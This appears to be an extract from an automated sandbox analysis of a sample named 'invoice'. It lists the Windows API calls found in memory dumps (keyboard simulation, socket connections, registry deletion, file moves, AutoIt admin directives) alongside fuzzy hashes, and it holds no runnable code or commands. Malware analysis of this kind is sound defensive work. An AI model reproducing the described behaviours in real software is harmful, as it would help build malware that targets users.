                        • GetKeyboardState.USER32(?), ref: 00FE10EB
                        • SetKeyboardState.USER32(?), ref: 00FE114C
                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FE1178
                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FE1195
                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FE11D9
                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FE11FA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessagePost$KeyboardState$Parent
                        • String ID:
                        • API String ID: 87235514-0
                        • Opcode ID: 855ece47be971be2f117609a29fc2543c4d4f2257185e32b92cd5ca9d34eac79
                        • Instruction ID: a7c908763ce6b2e752572b3bcbf65c40ad46c2d4c388ba350c185b52064ae3bc
                        • Opcode Fuzzy Hash: 855ece47be971be2f117609a29fc2543c4d4f2257185e32b92cd5ca9d34eac79
                        • Instruction Fuzzy Hash: 3E51E5B0A047D63DFB3687278C45BBA7EA97F06310F084589E2D5468C2C6A9AC88F751
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _wcsncpy$LocalTime
                        • String ID:
                        • API String ID: 2945705084-0
                        • Opcode ID: 43f90395a153804a3932a69e031b2e95c3ca578439d1e0891a6d8828df6c81ba
                        • Instruction ID: b6e93b0da4acdb3f02c7a482c259522dec8644700faa5aa7d98d460303102d16
                        • Opcode Fuzzy Hash: 43f90395a153804a3932a69e031b2e95c3ca578439d1e0891a6d8828df6c81ba
                        • Instruction Fuzzy Hash: F241D3E6C2061875CB51EBB49C46ACFB7BC9F06710F108466F908E3122E738A714E3E5
                        APIs
                          • Part of subcall function 00FE46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FE36DB,?), ref: 00FE46CC
                          • Part of subcall function 00FE46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FE36DB,?), ref: 00FE46E5
                        • lstrcmpiW.KERNEL32(?,?), ref: 00FE36FB
                        • _wcscmp.LIBCMT ref: 00FE3717
                        • MoveFileW.KERNEL32(?,?), ref: 00FE372F
                        • _wcscat.LIBCMT ref: 00FE3777
                        • SHFileOperationW.SHELL32(?), ref: 00FE37E3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                        • String ID: \*.*
                        • API String ID: 1377345388-1173974218
                        • Opcode ID: 7d1ae741f7659be5d8490d47b498bc6802aab2d4499b1680f0b94b8846ff73d6
                        • Instruction ID: 4abc0a7ae8d1258f4f014d3f4c7c502165f8949f36979289f4d73bbd293ff464
                        • Opcode Fuzzy Hash: 7d1ae741f7659be5d8490d47b498bc6802aab2d4499b1680f0b94b8846ff73d6
                        • Instruction Fuzzy Hash: 2341A2B250C3859EC752EF65C849ADBB7ECEF89350F00092EB489C3151EA38D748D756
                        APIs
                        • _memset.LIBCMT ref: 010072DC
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01007383
                        • IsMenu.USER32(?), ref: 0100739B
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010073E3
                        • DrawMenuBar.USER32 ref: 010073F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Menu$Item$DrawInfoInsert_memset
                        • String ID: 0
                        • API String ID: 3866635326-4108050209
                        • Opcode ID: ee023f791a3b0e4179f9b4d3953ec90ebab948da834afc8b203afe2ee902b8c5
                        • Instruction ID: c42b4c1b0c61caaeb134a194593865f02be928a5087007a084a580b73cf2b7c9
                        • Opcode Fuzzy Hash: ee023f791a3b0e4179f9b4d3953ec90ebab948da834afc8b203afe2ee902b8c5
                        • Instruction Fuzzy Hash: 7E412C75A00209EFEB22DF54D884E9ABBF8FB04314F058069EE9597290D735B951CF90
                        APIs
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0100105C
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01001086
                        • FreeLibrary.KERNEL32(00000000), ref: 0100113D
                          • Part of subcall function 0100102D: RegCloseKey.ADVAPI32(?), ref: 010010A3
                          • Part of subcall function 0100102D: FreeLibrary.KERNEL32(?), ref: 010010F5
                          • Part of subcall function 0100102D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01001118
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 010010E0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                        • String ID:
                        • API String ID: 395352322-0
                        • Opcode ID: c78a1b3b2c6b2b8913be395337fe15103ba1ef712935c60c131d6c76c5194432
                        • Instruction ID: 1fca62dbd8112f51e043930933a3ba0f773ad746d1836295320a6ef4d15b8aa0
                        • Opcode Fuzzy Hash: c78a1b3b2c6b2b8913be395337fe15103ba1ef712935c60c131d6c76c5194432
                        • Instruction Fuzzy Hash: 78311E71901119BFEB26DB94DC89EFFBBBCEF09340F0001A9F591A2180DB759E459BA0
                        APIs
                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0100631E
                        • GetWindowLongW.USER32(01505478,000000F0), ref: 01006351
                        • GetWindowLongW.USER32(01505478,000000F0), ref: 01006386
                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 010063B8
                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010063E2
                        • GetWindowLongW.USER32(00000000,000000F0), ref: 010063F3
                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0100640D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: LongWindow$MessageSend
                        • String ID:
                        • API String ID: 2178440468-0
                        • Opcode ID: 02378c949b5e359df882054589c86610f81f78b747b4b6f31971bb093ec41476
                        • Instruction ID: d41e818ab86c9c5a2e6ade1a393c53cb10ab8da357b5dc84fbad10f959bb62d1
                        • Opcode Fuzzy Hash: 02378c949b5e359df882054589c86610f81f78b747b4b6f31971bb093ec41476
                        • Instruction Fuzzy Hash: F8310634604251AFEB32CF28DC84F553BE2FB4A710F1581A8F5809F2E6CB67A850DB91
                        APIs
                          • Part of subcall function 00FF7EA0: inet_addr.WSOCK32(00000000), ref: 00FF7ECB
                        • socket.WSOCK32(00000002,00000001,00000006), ref: 00FF62DC
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF62EB
                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00FF6324
                        • connect.WSOCK32(00000000,?,00000010), ref: 00FF632D
                        • WSAGetLastError.WSOCK32 ref: 00FF6337
                        • closesocket.WSOCK32(00000000), ref: 00FF6360
                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00FF6379
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                        • String ID:
                        • API String ID: 910771015-0
                        • Opcode ID: 85eb1a854a6ea553d5fae765f47a35cb623c075a9ca6690d8d970632d327c2d9
                        • Instruction ID: 12ae0d588e3906a35461e9cbe84834384c6e01c393475742dfdca00e520b30d2
                        • Opcode Fuzzy Hash: 85eb1a854a6ea553d5fae765f47a35cb623c075a9ca6690d8d970632d327c2d9
                        • Instruction Fuzzy Hash: 5431E431600218AFDB20AF60CC85BBE77A9EF44724F044019FA46D7290DB79AD04ABA1
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                        • API String ID: 1038674560-2734436370
                        • Opcode ID: 8463cbd3ea9e9aa46db74e6d6fe48a84eb1b19c78ba975f7bd8e7982a9eb9f94
                        • Instruction ID: 0e9a65b424cdecd9f163aeaaf0580ee41270fb5a407ad76c9f46a82f98cd1ca6
                        • Opcode Fuzzy Hash: 8463cbd3ea9e9aa46db74e6d6fe48a84eb1b19c78ba975f7bd8e7982a9eb9f94
                        • Instruction Fuzzy Hash: 6E214C739086117BD221BA259C52FB773DADF56320F684037F48B86241EB9C9D86F391
                        APIs
                          • Part of subcall function 00F81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F81D73
                          • Part of subcall function 00F81D35: GetStockObject.GDI32(00000011), ref: 00F81D87
                          • Part of subcall function 00F81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F81D91
                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01007664
                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 01007671
                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0100767C
                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0100768B
                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01007697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$CreateObjectStockWindow
                        • String ID: Msctls_Progress32
                        • API String ID: 1025951953-3636473452
                        • Opcode ID: a40a089164932eb8ab2825d073509a40f03e1792f3ecccc034ca9144d4c69f89
                        • Instruction ID: dc4ad77d109a05b767f10c091fcf7a54837705b21c9b84306990b5478c051b13
                        • Opcode Fuzzy Hash: a40a089164932eb8ab2825d073509a40f03e1792f3ecccc034ca9144d4c69f89
                        • Instruction Fuzzy Hash: 2A11C8B2110219BFFF159F65CC85EE77F5DEF0C758F014115B644A6091C676AC21DBA0
                        APIs
                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FA41D2,?), ref: 00FA4123
                        • GetProcAddress.KERNEL32(00000000), ref: 00FA412A
                        • EncodePointer.KERNEL32(00000000), ref: 00FA4136
                        • DecodePointer.KERNEL32(00000001,00FA41D2,?), ref: 00FA4153
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                        • String ID: RoInitialize$combase.dll
                        • API String ID: 3489934621-340411864
                        • Opcode ID: b6765f030ebc525fc8261458c2ab796193fd468261207024ba72af1583e8552d
                        • Instruction ID: 9952b1459bf7a6de662ddd2b7ac9845cb6d32673fbe4037daf7bfd7bc2fef57c
                        • Opcode Fuzzy Hash: b6765f030ebc525fc8261458c2ab796193fd468261207024ba72af1583e8552d
                        • Instruction Fuzzy Hash: 45E01AB4A90351AFEB316B71ED8DB043AA4B756B16F509428B481ED098CBBF6080AF00
                        APIs
                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FA40F8), ref: 00FA41F8
                        • GetProcAddress.KERNEL32(00000000), ref: 00FA41FF
                        • EncodePointer.KERNEL32(00000000), ref: 00FA420A
                        • DecodePointer.KERNEL32(00FA40F8), ref: 00FA4225
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                        • String ID: RoUninitialize$combase.dll
                        • API String ID: 3489934621-2819208100
                        • Opcode ID: 06279e3ad4c219c8455bbdc6c208b41d3b0e5c26d5e35f78790c6821645de472
                        • Instruction ID: 2cefc0b5be974efa8e291b7f42830fa4da5bbd8cacc1afc680cbea97f21e56ec
                        • Opcode Fuzzy Hash: 06279e3ad4c219c8455bbdc6c208b41d3b0e5c26d5e35f78790c6821645de472
                        • Instruction Fuzzy Hash: 74E0B6F4981311ABEB31AB61EE4EB443AB4BB05752F209018F591E909CCBBF5500EB10
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove$__itow__swprintf
                        • String ID:
                        • API String ID: 3253778849-0
                        • Opcode ID: e08ce53f9d9641d01672f110f1d8884bd2845bf33452a8bec21962e3e20d00d8
                        • Instruction ID: f6476f21ec2a8627866f24392dd43d91fa842a12c7525c1fc0ea6ffac1f39470
                        • Opcode Fuzzy Hash: e08ce53f9d9641d01672f110f1d8884bd2845bf33452a8bec21962e3e20d00d8
                        • Instruction Fuzzy Hash: 8D61897150429AAFCF11FF21DC86AFE77A4AF45308F084519F859AB192DF78A901EB50
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 01000EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FFFE38,?,?), ref: 01000EBC
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01000348
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01000388
                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 010003AB
                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 010003D4
                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 01000417
                        • RegCloseKey.ADVAPI32(00000000), ref: 01000424
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                        • String ID:
                        • API String ID: 4046560759-0
                        • Opcode ID: ce2a222dc0e5f07488c34848961199e267d19a7bc203c537fa69d013cfbbd0a9
                        • Instruction ID: 54f16c29a46bd5810bb663e72d709176c099455bd82c4f4eb33ece412bdcaadd
                        • Opcode Fuzzy Hash: ce2a222dc0e5f07488c34848961199e267d19a7bc203c537fa69d013cfbbd0a9
                        • Instruction Fuzzy Hash: EE516631208200AFE716EB64CC85EAFBBE9FF88754F04891DF585872A1DB35E904DB52
                        APIs
                        • GetMenu.USER32(?), ref: 01005864
                        • GetMenuItemCount.USER32(00000000), ref: 0100589B
                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 010058C3
                        • GetMenuItemID.USER32(?,?), ref: 01005932
                        • GetSubMenu.USER32(?,?), ref: 01005940
                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 01005991
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Menu$Item$CountMessagePostString
                        • String ID:
                        • API String ID: 650687236-0
                        • Opcode ID: fcf851bb5046156b98444ba6d14b231d08d5cb6fe61aaaf243862b7eeffaf929
                        • Instruction ID: 1d87c8f38af7b8073c3dcbb06f1856a1d3a71a4e8e9f5c2fc5ae7669fb082d36
                        • Opcode Fuzzy Hash: fcf851bb5046156b98444ba6d14b231d08d5cb6fe61aaaf243862b7eeffaf929
                        • Instruction Fuzzy Hash: 9951A231A00215AFDF12EFA4CC45AAEB7B4EF49320F144099E985BB391CB75AE01DF91
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00FDF218
                        • VariantClear.OLEAUT32(00000013), ref: 00FDF28A
                        • VariantClear.OLEAUT32(00000000), ref: 00FDF2E5
                        • _memmove.LIBCMT ref: 00FDF30F
                        • VariantClear.OLEAUT32(?), ref: 00FDF35C
                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FDF38A
                        Similarity
                        • API ID: Variant$Clear$ChangeInitType_memmove
                        • String ID:
                        • API String ID: 1101466143-0
                        • Opcode ID: 3f666b0a59ee56c536b263f54e79630470b2e07f22d4cb59df92c88619e47230
                        • Instruction ID: 83d59ecf6ed81363f9f02fbc5380be1a23234dde5c71550484f97bbc3ff793ed
                        • Opcode Fuzzy Hash: 3f666b0a59ee56c536b263f54e79630470b2e07f22d4cb59df92c88619e47230
                        • Instruction Fuzzy Hash: B3514DB5A002099FCB14CF58C884EAAB7B9FF4C314F19856AED59DB305D734E915CBA0
                        APIs
                        • _memset.LIBCMT ref: 00FE2550
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE259B
                        • IsMenu.USER32(00000000), ref: 00FE25BB
                        • CreatePopupMenu.USER32 ref: 00FE25EF
                        • GetMenuItemCount.USER32(000000FF), ref: 00FE264D
                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00FE267E
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                        • String ID:
                        • API String ID: 3311875123-0
                        • Opcode ID: 019e091c88d8f586e33d039f83ba587a45971a8bb11d2471037e38454b441f9f
                        • Instruction ID: 8e053af5976793655c4ecf31d7637adac01d1134ffbdafb23960183ee207a663
                        • Opcode Fuzzy Hash: 019e091c88d8f586e33d039f83ba587a45971a8bb11d2471037e38454b441f9f
                        • Instruction Fuzzy Hash: 7551C170A01385DFCF61CF69D988BADBBF8BF44324F144259E85197290FB719904EB51
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00F8179A
                        • GetWindowRect.USER32(?,?), ref: 00F817FE
                        • ScreenToClient.USER32(?,?), ref: 00F8181B
                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F8182C
                        • EndPaint.USER32(?,?), ref: 00F81876
                        Similarity
                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                        • String ID:
                        • API String ID: 1827037458-0
                        • Opcode ID: a029baa139f9d46276243aa2fed260ff51d93098b0f6e23b9ca39347c6f2cf87
                        • Instruction ID: 4374f3df59db745cc4dd5705f74da94a2e2fc505bdd25af74c6579fda941057c
                        • Opcode Fuzzy Hash: a029baa139f9d46276243aa2fed260ff51d93098b0f6e23b9ca39347c6f2cf87
                        • Instruction Fuzzy Hash: 0441BE71504301AFD721EF25CC85FFA7BE8FB49324F140229FAA48A1A1CB759846EB61
                        APIs
                        • ShowWindow.USER32(010457B0,00000000,01505478,?,?,010457B0,?,0100B5DC,?,?), ref: 0100B746
                        • EnableWindow.USER32(00000000,00000000), ref: 0100B76A
                        • ShowWindow.USER32(010457B0,00000000,01505478,?,?,010457B0,?,0100B5DC,?,?), ref: 0100B7CA
                        • ShowWindow.USER32(00000000,00000004,?,0100B5DC,?,?), ref: 0100B7DC
                        • EnableWindow.USER32(00000000,00000001), ref: 0100B800
                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0100B823
                        Similarity
                        • API ID: Window$Show$Enable$MessageSend
                        • String ID:
                        • API String ID: 642888154-0
                        • Opcode ID: 770adce1846c5635300755deb9c75107cd872a55a7981c2df89913d44ab34ea6
                        • Instruction ID: f47e3fb0e61f066e383cb5402e60efdb73b6254b86c34c0aa86ff10a06283bbd
                        • Opcode Fuzzy Hash: 770adce1846c5635300755deb9c75107cd872a55a7981c2df89913d44ab34ea6
                        • Instruction Fuzzy Hash: 36414F38644145EFEB63DF28C489B947FE1BB05314F1841E9EA8D8F2A2CB31A456DB51
                        APIs
                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00FF4F57,?,?,00000000,00000001), ref: 00FF71C1
                          • Part of subcall function 00FF3AB6: GetWindowRect.USER32(?,?), ref: 00FF3AC9
                        • GetDesktopWindow.USER32 ref: 00FF71EB
                        • GetWindowRect.USER32(00000000), ref: 00FF71F2
                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00FF7224
                          • Part of subcall function 00FE52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5363
                        • GetCursorPos.USER32(?), ref: 00FF7250
                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00FF72AE
                        Similarity
                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                        • String ID:
                        • API String ID: 4137160315-0
                        • Opcode ID: ab219d26da730c6c514d6ca9485c9214a041b90c444120fe0818bfb72aa9f906
                        • Instruction ID: 7685e2ba4435d3a6173cf666cd8c937eea02ab2c4a05948bf2e4fc25281e3518
                        • Opcode Fuzzy Hash: ab219d26da730c6c514d6ca9485c9214a041b90c444120fe0818bfb72aa9f906
                        • Instruction Fuzzy Hash: E031C67250930AAFD720EF15CC49B5BB7E9FF88314F00091AF68597191CB75E909DB92
                        APIs
                          • Part of subcall function 00FD83D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FD83E8
